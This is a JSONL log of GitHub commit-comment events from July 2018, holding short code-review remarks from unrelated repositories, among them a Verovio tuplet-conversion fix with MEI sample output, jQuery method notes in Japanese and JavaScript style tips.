{"id":"8038230990","type":"CommitCommentEvent","actor":{"login":"FerrariMartini"},"repo":{"name":"FerrariMartini/Fund.-Data-Science-I---Udacity"},"payload":{"comment":{"id":29888190,"position":null,"line":null,"path":null,"commit_id":"ee89bf49d84f2477e46e33ddca45584ee67f3cb1","created_at":"2018-07-30T14:52:05Z","updated_at":"2018-07-30T14:52:05Z","author_association":"OWNER","body":"What's it?"}},"created_at":"2018-07-30T14:52:05Z"}
{"id":"8038234521","type":"CommitCommentEvent","actor":{"login":"furusiyya"},"repo":{"name":"DES-Network/quorum"},"payload":{"comment":{"id":29888194,"position":3,"line":3,"path":"test-network/README.md","commit_id":"106ca7877ac0150dff1bf175f959f8fd3fa15a60","created_at":"2018-07-30T14:52:37Z","updated_at":"2018-07-30T14:52:37Z","author_association":"NONE","body":"You may want to add some more text like:\r\nFollowing files will help in setting up the test network. So now I am gonna read about files and their description."}},"created_at":"2018-07-30T14:52:37Z"}
{"id":"8038235996","type":"CommitCommentEvent","actor":{"login":"c-osanai"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29888197,"position":26,"line":26,"path":"screen/test01.html","commit_id":"769893412adf24e60c3c9f7424cfe2b019d24e5d","created_at":"2018-07-30T14:52:51Z","updated_at":"2018-07-30T14:52:51Z","author_association":"OWNER","body":"変数のcssオブジェクトです"}},"created_at":"2018-07-30T14:52:51Z"}
{"id":"8038241646","type":"CommitCommentEvent","actor":{"login":"furusiyya"},"repo":{"name":"DES-Network/quorum"},"payload":{"comment":{"id":29888206,"position":17,"line":17,"path":"test-network/README.md","commit_id":"106ca7877ac0150dff1bf175f959f8fd3fa15a60","created_at":"2018-07-30T14:53:40Z","updated_at":"2018-07-30T14:53:40Z","author_association":"NONE","body":"I haven't launched the network yet."}},"created_at":"2018-07-30T14:53:40Z"}
{"id":"8038246235","type":"CommitCommentEvent","actor":{"login":"nebrot"},"repo":{"name":"clickstorm/cs_seo"},"payload":{"comment":{"id":29888214,"position":null,"line":null,"path":null,"commit_id":"663df85f66819d9d26541e73ada82f07eb6b3db9","created_at":"2018-07-30T14:54:18Z","updated_at":"2018-07-30T14:54:18Z","author_association":"CONTRIBUTOR","body":"See #185, it's fixed in master with https://github.com/clickstorm/cs_seo/commit/299d96a01fa3d02432bd7b70fa92f201108ba187"}},"created_at":"2018-07-30T14:54:18Z"}
{"id":"8038247199","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29888215,"position":null,"line":null,"path":null,"commit_id":"0f6a176fcce0005b77ed3bec3424c8f9bd67b1eb","created_at":"2018-07-30T14:54:28Z","updated_at":"2018-07-30T14:54:28Z","author_association":"CONTRIBUTOR","body":"The Humdrum-to-MEI converter code was making an assumption that tuplets were identified in sequence (which they are not).   This was causing the first labeled tuplet to disappear when there was a tuplet merger in the measure since all following tuplet numbers were reduced by one (but reducing 1 to 0 meant incorrectly that the tuplet group no longer existed).  And when the tuplet grouping disappeared, the rhythm was not adjusted to a power of two, so the notes were being displayed in verovio as breves since there was no printable `@dur`.   Also, the `@numscale` needed to be doubled when two adjacent tuplet groups are merged automatically (related to beaming).  For example when two sets of triplets are merged, the resulting tuplet should be a sextuplet.\r\n\r\nThis is related to issue https://github.com/humdrum-tools/verovio-humdrum-viewer/issues/142\r\n\r\nExample:\r\n\r\n```\r\n**kern\r\n=1\r\n24rL\r\n24d\r\n24c\r\n24d\r\n24c\r\n24dJ\r\n24cL\r\n24d\r\n24c\r\n24d\r\n24c\r\n24dJ\r\n=2\r\n24r\r\n24dL\r\n24c\r\n24d\r\n24c\r\n24dJ\r\n24cL\r\n24d\r\n24c\r\n24d\r\n24c\r\n24dJ\r\n=3\r\n24r\r\n24d\r\n24cL\r\n24d\r\n24c\r\n24dJ\r\n24cL\r\n24d\r\n24c\r\n24d\r\n24c\r\n24dJ\r\n=4\r\n24r\r\n24d\r\n24c\r\n24dL\r\n24c\r\n24dJ\r\n24cL\r\n24d\r\n24c\r\n24d\r\n24c\r\n24dJ\r\n==\r\n*-\r\n```\r\n\r\nNew (correct) rendering in verovio:\r\n\r\n<img width=\"1392\" alt=\"screen shot 2018-07-30 at 4 44 45 pm\" src=\"https://user-images.githubusercontent.com/3487289/43404886-d839875c-9418-11e8-93d3-02b97b527339.png\">\r\n\r\n\r\nConverted MEI data:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-30T16:46:38\" version=\"2.0.0-dev-6cdb4a3\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001572600724\">\r\n                <score xml:id=\"score-0000001619124639\">\r\n                    <scoreDef xml:id=\"scoredef-0000001323568050\">\r\n                        <staffGrp xml:id=\"staffgrp-0000001877334888\">\r\n                            <staffDef xml:id=\"staffdef-0000001593781880\" clef.shape=\"G\" clef.line=\"2\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000000526505857\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L2\" n=\"1\">\r\n                            <staff xml:id=\"staff-L2F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L2F1N1\" n=\"1\">\r\n                                    <tuplet xml:id=\"tuplet-L3F1-L8F1\" num=\"6\" numbase=\"4\" num.format=\"count\">\r\n                                        <beam xml:id=\"beam-L3F1-L8F1\">\r\n                                            <rest xml:id=\"rest-L3F1\" dur=\"16\" />\r\n                                            <note xml:id=\"note-L4F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L5F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L6F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L7F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L8F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        </beam>\r\n                                    </tuplet>\r\n                                    <tuplet xml:id=\"tuplet-L9F1-L14F1\" num=\"6\" numbase=\"4\" num.format=\"count\">\r\n                                        <beam xml:id=\"beam-L9F1-L14F1\">\r\n                                            <note xml:id=\"note-L9F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L10F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L11F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L12F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L13F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L14F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        </beam>\r\n                                    </tuplet>\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L15\" n=\"2\">\r\n                            <staff xml:id=\"staff-L15F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L15F1N1\" n=\"1\">\r\n                                    <tuplet xml:id=\"tuplet-L16F1-L21F1\" num=\"6\" numbase=\"4\" num.format=\"count\">\r\n                                        <rest xml:id=\"rest-L16F1\" dur=\"16\" />\r\n                                        <beam xml:id=\"beam-L17F1-L21F1\">\r\n                                            <note xml:id=\"note-L17F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L18F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L19F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L20F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L21F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        </beam>\r\n                                    </tuplet>\r\n                                    <tuplet xml:id=\"tuplet-L22F1-L27F1\" num=\"6\" numbase=\"4\" num.format=\"count\">\r\n                                        <beam xml:id=\"beam-L22F1-L27F1\">\r\n                                            <note xml:id=\"note-L22F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L23F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L24F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L25F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L26F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L27F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        </beam>\r\n                                    </tuplet>\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L28\" n=\"3\">\r\n                            <staff xml:id=\"staff-L28F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L28F1N1\" n=\"1\">\r\n                                    <tuplet xml:id=\"tuplet-L29F1-L34F1\" num=\"6\" numbase=\"4\" num.format=\"count\">\r\n                                        <rest xml:id=\"rest-L29F1\" dur=\"16\" />\r\n                                        <note xml:id=\"note-L30F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <beam xml:id=\"beam-L31F1-L34F1\">\r\n                                            <note xml:id=\"note-L31F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L32F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L33F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L34F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        </beam>\r\n                                    </tuplet>\r\n                                    <tuplet xml:id=\"tuplet-L35F1-L40F1\" num=\"6\" numbase=\"4\" num.format=\"count\">\r\n                                        <beam xml:id=\"beam-L35F1-L40F1\">\r\n                                            <note xml:id=\"note-L35F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L36F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L37F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L38F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L39F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L40F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        </beam>\r\n                                    </tuplet>\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L41\" right=\"end\" n=\"4\">\r\n                            <staff xml:id=\"staff-L41F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L41F1N1\" n=\"1\">\r\n                                    <tuplet xml:id=\"tuplet-L42F1-L44F1\" num=\"3\" numbase=\"2\" num.format=\"count\">\r\n                                        <rest xml:id=\"rest-L42F1\" dur=\"16\" />\r\n                                        <note xml:id=\"note-L43F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L44F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                    </tuplet>\r\n                                    <tuplet xml:id=\"tuplet-L45F1-L47F1\" num=\"3\" numbase=\"2\" num.format=\"count\">\r\n                                        <beam xml:id=\"beam-L45F1-L47F1\">\r\n                                            <note xml:id=\"note-L45F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L46F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L47F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        </beam>\r\n                                    </tuplet>\r\n                                    <tuplet xml:id=\"tuplet-L48F1-L53F1\" num=\"6\" numbase=\"4\" num.format=\"count\">\r\n                                        <beam xml:id=\"beam-L48F1-L53F1\">\r\n                                            <note xml:id=\"note-L48F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L49F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L50F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L51F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L52F1\" dur=\"16\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L53F1\" dur=\"16\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        </beam>\r\n                                    </tuplet>\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n"}},"created_at":"2018-07-30T14:54:28Z"}
{"id":"8038247256","type":"CommitCommentEvent","actor":{"login":"c-osanai"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29888216,"position":16,"line":12,"path":"scroll/test03.html","commit_id":"42059c591d981106639718cab8e4b3f71e698d64","created_at":"2018-07-30T14:54:28Z","updated_at":"2018-07-30T14:54:28Z","author_association":"OWNER","body":"jQueryオブジェクトのscrollメソッドです"}},"created_at":"2018-07-30T14:54:28Z"}
{"id":"8038248566","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29888220,"position":48,"line":488,"path":"source/js/diva.js","commit_id":"3ecc06377d3f790088066bacaa64e24f1633a02b","created_at":"2018-07-30T14:54:39Z","updated_at":"2018-07-30T14:54:39Z","author_association":"MEMBER","body":"You should be able to do `.bind(this)` without setting the outer `_this` variable."}},"created_at":"2018-07-30T14:54:39Z"}
{"id":"8038248962","type":"CommitCommentEvent","actor":{"login":"furusiyya"},"repo":{"name":"DES-Network/quorum"},"payload":{"comment":{"id":29888221,"position":18,"line":18,"path":"test-network/README.md","commit_id":"106ca7877ac0150dff1bf175f959f8fd3fa15a60","created_at":"2018-07-30T14:54:43Z","updated_at":"2018-07-30T14:54:43Z","author_association":"NONE","body":"We have to accept that now we have our own network with a lot of customizations, so we can forget about quorum here. Now features are in the product name DES_Network"}},"created_at":"2018-07-30T14:54:43Z"}
{"id":"8038249203","type":"CommitCommentEvent","actor":{"login":"leseb"},"repo":{"name":"ceph/ceph"},"payload":{"comment":{"id":29888222,"position":7,"line":57,"path":"src/common/common_init.cc","commit_id":"59ee2e8d3b14511e8d07ef8325ac8ca96e051784","created_at":"2018-07-30T14:54:45Z","updated_at":"2018-07-30T14:54:45Z","author_association":"CONTRIBUTOR","body":"Yeah but what about rbd-mirror and rgw?"}},"created_at":"2018-07-30T14:54:45Z"}
{"id":"8038249286","type":"CommitCommentEvent","actor":{"login":"castaway"},"repo":{"name":"pplu/botocore"},"payload":{"comment":{"id":29888224,"position":null,"line":null,"path":null,"commit_id":"93d62cf5cf6c848bb1a1262c198202152f766b9a","created_at":"2018-07-30T14:54:46Z","updated_at":"2018-07-30T14:54:46Z","author_association":"NONE","body":"I think this change is backwards.. the docs for Filter/Prefix say:\r\n        \"Prefix\":{\r\n          \"shape\":\"Prefix\",\r\n          \"documentation\":\"<p>Prefix identifying one or more objects to which the rule applies. This is deprecated; use Filter instead.</p>\",\r\n          \"deprecated\":true\r\n        },\r\n        \"Filter\":{\"shape\":\"LifecycleRuleFilter\"},\r\n        \"Status\":{\r\n          \"shape\":\"ExpirationStatus\",\r\n          \"documentation\":\"<p>If 'Enabled', the rule is currently being applied. If 'Disabled', the rule is not currently being applied.</p>\"\r\n        },\r\n\r\n... Prefix is the deprecated one, it looks like.\r\n"}},"created_at":"2018-07-30T14:54:46Z"}
{"id":"8038249682","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29888226,"position":48,"line":488,"path":"source/js/diva.js","commit_id":"3ecc06377d3f790088066bacaa64e24f1633a02b","created_at":"2018-07-30T14:54:49Z","updated_at":"2018-07-30T14:54:49Z","author_association":"MEMBER","body":"https://stackoverflow.com/a/15594458/8760061"}},"created_at":"2018-07-30T14:54:49Z"}
{"id":"8038250544","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29888230,"position":null,"line":null,"path":null,"commit_id":"ce033af8f4259cfbe8521101fae6293bb218c3c8","created_at":"2018-07-30T14:54:57Z","updated_at":"2018-07-30T14:54:57Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2954 of 2954 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T14:54:57Z"}
{"id":"8038253681","type":"CommitCommentEvent","actor":{"login":"c-osanai"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29888240,"position":17,"line":13,"path":"scroll/test03.html","commit_id":"42059c591d981106639718cab8e4b3f71e698d64","created_at":"2018-07-30T14:55:24Z","updated_at":"2018-07-30T14:55:24Z","author_association":"OWNER","body":"jQueryオブジェクトのscrollTopメソッドです"}},"created_at":"2018-07-30T14:55:24Z"}
{"id":"8038258181","type":"CommitCommentEvent","actor":{"login":"svett"},"repo":{"name":"iron/iron"},"payload":{"comment":{"id":29888250,"position":null,"line":null,"path":null,"commit_id":"9ad396d17733f3e082b91dbf18daceabd961f4c6","created_at":"2018-07-30T14:56:03Z","updated_at":"2018-07-30T14:56:03Z","author_association":"NONE","body":"So are you planing to support it again?"}},"created_at":"2018-07-30T14:56:03Z"}
{"id":"8038258998","type":"CommitCommentEvent","actor":{"login":"c-osanai"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29888251,"position":20,"line":20,"path":"scroll/test04.html","commit_id":"33c58142e848b143e8305493d9cb3f1d712149ed","created_at":"2018-07-30T14:56:12Z","updated_at":"2018-07-30T14:56:12Z","author_association":"OWNER","body":"jQueryオブジェクトのfadeInメソッドです"}},"created_at":"2018-07-30T14:56:12Z"}
{"id":"8038260461","type":"CommitCommentEvent","actor":{"login":"c-osanai"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29888257,"position":22,"line":22,"path":"scroll/test04.html","commit_id":"33c58142e848b143e8305493d9cb3f1d712149ed","created_at":"2018-07-30T14:56:24Z","updated_at":"2018-07-30T14:56:24Z","author_association":"OWNER","body":"jQueryオブジェクトのfadeOutメソッドです"}},"created_at":"2018-07-30T14:56:24Z"}
{"id":"8038260874","type":"CommitCommentEvent","actor":{"login":"EricHanLiu"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29888260,"position":22,"line":46,"path":"source/js/plugins/metadata.js","commit_id":"8afdf0ea5aa8c022336d42172678ec6bb06ee463","created_at":"2018-07-30T14:56:27Z","updated_at":"2018-07-30T14:56:27Z","author_association":"NONE","body":"w3schools format lol, will fix"}},"created_at":"2018-07-30T14:56:27Z"}
{"id":"8038264583","type":"CommitCommentEvent","actor":{"login":"arunassain"},"repo":{"name":"arunassain/android_device_lenovo_karate"},"payload":{"comment":{"id":29888268,"position":null,"line":null,"path":null,"commit_id":"ca96b8eb3322a570e22e4f4a190ae5d38c2e6d0c","created_at":"2018-07-30T14:57:00Z","updated_at":"2018-07-30T14:57:00Z","author_association":"OWNER","body":"Seri da seri 😆\n\nOn Mon 30 Jul, 2018, 8:11 PM Harshit Jain, <notifications@github.com> wrote:\n\n> Dayum That's some Godly code :D !!!!.\n>\n> I don't know what you smoke before coding but I would defiantly try it\n> once !\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/arunassain/android_device_lenovo_karate/commit/ca96b8eb3322a570e22e4f4a190ae5d38c2e6d0c#commitcomment-29887991>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AYuzS259lK7jou58oSs-exSkGCRTNncLks5uLxsPgaJpZM4Vmiko>\n> .\n>\n"}},"created_at":"2018-07-30T14:57:00Z"}
{"id":"8038265449","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29888269,"position":31,"line":55,"path":"source/js/plugins/metadata.js","commit_id":"8afdf0ea5aa8c022336d42172678ec6bb06ee463","created_at":"2018-07-30T14:57:08Z","updated_at":"2018-07-30T14:57:08Z","author_association":"MEMBER","body":"A good practice is to outer-scope your terminator condition. In this case, you call `metadata.length` for every iteration, even though it's the same value. You can do `for (var i = 0, len = metadata.length; i < len; i++)` and it will calculate the length once and then use it."}},"created_at":"2018-07-30T14:57:08Z"}
{"id":"8038266558","type":"CommitCommentEvent","actor":{"login":"shinoi2"},"repo":{"name":"shinoi2/fireplace"},"payload":{"comment":{"id":29888273,"position":10,"line":44,"path":"fireplace/cards/wog/mage.py","commit_id":"8a85c4254057825124be4d89622eb476446ee757","created_at":"2018-07-30T14:57:18Z","updated_at":"2018-07-30T14:57:18Z","author_association":"OWNER","body":"Sorry, I will fixed it."}},"created_at":"2018-07-30T14:57:18Z"}
{"id":"8038267119","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29888275,"position":null,"line":null,"path":null,"commit_id":"23e6d90556400ad3c98f4b431607cbdd8a1c57fd","created_at":"2018-07-30T14:57:23Z","updated_at":"2018-07-30T14:57:23Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/119"}},"created_at":"2018-07-30T14:57:23Z"}
{"id":"8038267769","type":"CommitCommentEvent","actor":{"login":"c-osanai"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29888276,"position":25,"line":25,"path":"scroll/test06.html","commit_id":"d1116973a73977b9f76b5039dc768787d110b587","created_at":"2018-07-30T14:57:29Z","updated_at":"2018-07-30T14:57:29Z","author_association":"OWNER","body":"jQueryオブジェクトのremoveClassメソッドです"}},"created_at":"2018-07-30T14:57:29Z"}
{"id":"8038268195","type":"CommitCommentEvent","actor":{"login":"vels527"},"repo":{"name":"vels527/AirPlus"},"payload":{"comment":{"id":29888278,"position":33,"line":52,"path":"src/private/AirbnbGuestList/AirbnbGuestList/Program.cs","commit_id":"951fdb32ec6f3f44c577e6178f40bf72bdce7353","created_at":"2018-07-30T14:57:33Z","updated_at":"2018-07-30T14:57:33Z","author_association":"OWNER","body":"What are we trying to do here?"}},"created_at":"2018-07-30T14:57:33Z"}
{"id":"8038269495","type":"CommitCommentEvent","actor":{"login":"c-osanai"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29888279,"position":30,"line":30,"path":"scroll/test06.html","commit_id":"d1116973a73977b9f76b5039dc768787d110b587","created_at":"2018-07-30T14:57:44Z","updated_at":"2018-07-30T14:57:44Z","author_association":"OWNER","body":"jQueryオブジェクトのaddClassメソッドです"}},"created_at":"2018-07-30T14:57:44Z"}
{"id":"8038269554","type":"CommitCommentEvent","actor":{"login":"jbertram"},"repo":{"name":"apache/activemq-artemis"},"payload":{"comment":{"id":29888281,"position":19,"line":574,"path":"artemis-jms-client/src/main/java/org/apache/activemq/artemis/jms/client/ActiveMQMessageProducer.java","commit_id":"a2da41ee2e347bcf8fe721bded89e4a78ca14cfb","created_at":"2018-07-30T14:57:44Z","updated_at":"2018-07-30T14:57:44Z","author_association":"CONTRIBUTOR","body":"The double confirm situation is described in the comment. Basically, while the failed async packet is not confirmed subsequent packets may be confirmed which will in turn confirm previously unconfirmed packets (see `org.apache.activemq.artemis.core.protocol.core.impl.ChannelImpl#clearUpTo`).  I could not determine how to maintain compatibility with current behavior and add this new feature without this `active` check.  That said, I will certainly change it to be an atomic field updater."}},"created_at":"2018-07-30T14:57:44Z"}
{"id":"8038270900","type":"CommitCommentEvent","actor":{"login":"JohnSmithSB"},"repo":{"name":"JohnSmithSB/HelloWorldApp"},"payload":{"comment":{"id":29888283,"position":null,"line":null,"path":null,"commit_id":"cd0cada9754b9760eecfd11ab98af11579150d6f","created_at":"2018-07-30T14:57:56Z","updated_at":"2018-07-30T14:57:56Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://00a39d79.ngrok.io/ui#review:id=30)"}},"created_at":"2018-07-30T14:57:56Z"}
{"id":"8038284170","type":"CommitCommentEvent","actor":{"login":"Fruskyyy"},"repo":{"name":"Fruskyyy/FruskyPrivate"},"payload":{"comment":{"id":29888315,"position":13,"line":13,"path":"HWID.txt","commit_id":"d48de14e1077e2546a737780ad5d6a2546c7ca9e","created_at":"2018-07-30T14:59:56Z","updated_at":"2018-07-30T14:59:56Z","author_association":"OWNER","body":"gg"}},"created_at":"2018-07-30T14:59:56Z"}
{"id":"8038288034","type":"CommitCommentEvent","actor":{"login":"c-osanai"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29888329,"position":21,"line":21,"path":"screen/test05.html","commit_id":"9bfdc6ab31c35d6aa26265a8e026eaeb179f2cc5","created_at":"2018-07-30T15:00:29Z","updated_at":"2018-07-30T15:00:29Z","author_association":"OWNER","body":"変数のfindメソッドです"}},"created_at":"2018-07-30T15:00:29Z"}
{"id":"8038290554","type":"CommitCommentEvent","actor":{"login":"tobya"},"repo":{"name":"tobya/DocTo"},"payload":{"comment":{"id":29888336,"position":null,"line":null,"path":null,"commit_id":"15a45a3c124901961f3fbe3f6935ecf0318a6b10","created_at":"2018-07-30T15:00:52Z","updated_at":"2018-07-30T15:00:52Z","author_association":"OWNER","body":"Basis of #53 "}},"created_at":"2018-07-30T15:00:52Z"}
{"id":"8038292573","type":"CommitCommentEvent","actor":{"login":"truesonic53"},"repo":{"name":"CompleteMonochrome/ddlctrueroute"},"payload":{"comment":{"id":29888340,"position":null,"line":null,"path":null,"commit_id":"57a8c2957f75624c67dba80d0d73546543077aba","created_at":"2018-07-30T15:01:11Z","updated_at":"2018-07-30T15:01:11Z","author_association":"CONTRIBUTOR","body":"uwu"}},"created_at":"2018-07-30T15:01:11Z"}
{"id":"8038292754","type":"CommitCommentEvent","actor":{"login":"c-osanai"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29888341,"position":37,"line":37,"path":"screen/test05.html","commit_id":"9bfdc6ab31c35d6aa26265a8e026eaeb179f2cc5","created_at":"2018-07-30T15:01:12Z","updated_at":"2018-07-30T15:01:12Z","author_association":"OWNER","body":"jQueryオブジェクトのfilterメソッドです"}},"created_at":"2018-07-30T15:01:12Z"}
{"id":"8038299054","type":"CommitCommentEvent","actor":{"login":"stephyswe"},"repo":{"name":"stephyswe/LaraCasts-Forum"},"payload":{"comment":{"id":29888355,"position":4,"line":17,"path":"app/Reply.php","commit_id":"12db9990c969b9bedc4c916f99dd53680363c2a4","created_at":"2018-07-30T15:02:09Z","updated_at":"2018-07-30T15:02:09Z","author_association":"OWNER","body":"Should be\r\nprotected $appends = ['favoritesCount', 'isFavorited'];"}},"created_at":"2018-07-30T15:02:09Z"}
